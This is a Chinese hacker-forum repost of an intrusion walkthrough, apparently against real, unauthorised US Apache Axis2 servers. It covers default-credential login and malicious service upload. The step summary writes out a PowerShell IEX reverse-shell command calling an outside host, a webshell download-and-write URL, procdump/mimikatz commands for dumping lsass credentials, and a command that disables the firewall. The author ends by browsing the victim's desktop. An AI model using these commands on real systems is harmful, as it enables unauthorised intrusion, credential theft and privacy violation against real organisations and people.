跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

0x01 目标

country="US" && app="APACHE-Axis"

从老洞捡些漏网之鱼,没准还会有意外收获

1049983-20220112164702590-1914940666.png

目标出现

1049983-20220112164703269-409796320.png

还是熟悉的页面,熟悉的端口

然后尝试默认口令登录,ok, 这下稳了

1049983-20220112164703784-492837324.png

先搜集一下信息

1049983-20220112164704428-1031611363.png

不要上来就部署包,先看一下现有的服务,像这种弱口令的基本上99.9999%都已经被人搞过了

1049983-20220112164704943-1143663517.png

1049983-20220112164705503-859439348.png

再上传包就多此一举了,可以直接利用

找了一圈没发现遗留的马儿

找绝对路径自己上传

C:/elocker/webapps/admin/WEB-INF/classes

1049983-20220112164705932-1966461831.png

顺手一测,竟然可以出网,也不需要传shell了,直接掏出cs

1049983-20220112164706379-551799478.png

执行命令

1049983-20220112164707036-902281158.png

看结果失败了

0x02 反弹shell

难道是因为在url里执行,导致powershell命令没有执行成功吗?

带着这个疑问 反弹shell尝试一下

1049983-20220112164707518-742169218.png

1049983-20220112164707971-2053066810.png

结果还是失败,可以确定,应该是有waf

0x03 写入shell

x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp

1049983-20220112164708430-796309663.png

1049983-20220112164708961-1830718985.png

查看一下进程

1049983-20220112164709700-431368973.png

通过对比发现某安全卫士

1049983-20220112164710274-561240991.png

0x04 绕过杀软

通过测试发现,最基本的net user也执行不了

摆在面前的路只有2条

  • 做免杀
  • 抓密码

果断选择抓密码,简单有效。

mimikatz不免杀不可直接用

这里我利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码

上传 procdump64.exe 并下载lsass.dmp

1049983-20220112164710740-364111678.png

1049983-20220112164711227-614035489.png

再在本地解析文件

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 导出为lsass.dump文件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
# 把lsass.dmp放在mimikatz目录利用

1049983-20220112164711763-157868246.png

得到hash,破解密码

1049983-20220112164712218-2039058059.png

0x05 登录服务器

查看防火墙状态

Netsh Advfirewall show allprofiles

关闭防火墙

NetSh Advfirewall set allprofiles state off

1049983-20220112164712683-3724176.png

1049983-20220112164713102-414798445.png

内网IP,需搭建代理

1049983-20220112164713537-195359877.png

1049983-20220112164713911-848756372.png

1049983-20220112164714273-555776031.png

0x06 登录云桌面,发现意外惊喜

发现机主运行了 telegram,嘿嘿

1049983-20220112164714865-1133025225.png

1049983-20220112164716092-1085897559.png

1049983-20220112164716924-903276189.png


0x07 总结

1.通过fofa的语法country="US" && app="APACHE-Axis"进行搜索漏洞目标
2.发现存在一个axis2的后台,该页面存在弱口令(admin/axis2)
3.在后台处的upload  sevice处上传AxisInvoker.aar包
4.查询到网站的绝对路径为:C:/elocker/webapps/admin/WEB-INF/classes
http://www.xxx.com/axis2/services/AxisInvoker/info
5.尝试通过cs生成posershell后门程序,通过访问下面地址触发,但是访问失败(可能系统中存在杀软拦截了)
http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666
http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=dir%20C:
6.通过下载文件方式写入大马
http://www.xxx.com/axis2/services/AxisInvoker/download?url=http://vps/data.txt&file=C:\elocker\webapps\admin\axis2-web\shell.jsp
7.在大马中执行tasklist,发现存在360tary(360杀毒)以及zhudongfangyu.exe(安全卫士)
8.在大马中上传冰蝎的一句户话木马,然后连接,执行命令net user出错。
9.这里通过冰蝎上传 procdump64.exe,并执行命令导出lsass.dmp
 procdump64.exe -accepteula -ma lsass.exe lsass.dmp
10.通过冰蝎下载 lsass.dmp到本地。
11.通过mimkiatz导入lsass.dump并读取出hash值
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
12.通过md5破解网站对HSAH值进行NTML破解,并成功破解出密码:123QWEqwe
13.通过大马执行以下命令
Netsh Advfirewall show allprofiles  //查看防火墙状态
NetSh Advfirewall set allprofiles state off  //关闭防火墙
14.通过冰蝎自带的socke功能开启代理,本地设置Proxifier代理将MSTSC添加到代理中
15.通过代理执行mstsc,远程桌面登录内网,桌面发现存在telegram




原文链接: https://xz.aliyun.com/t/9856





创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。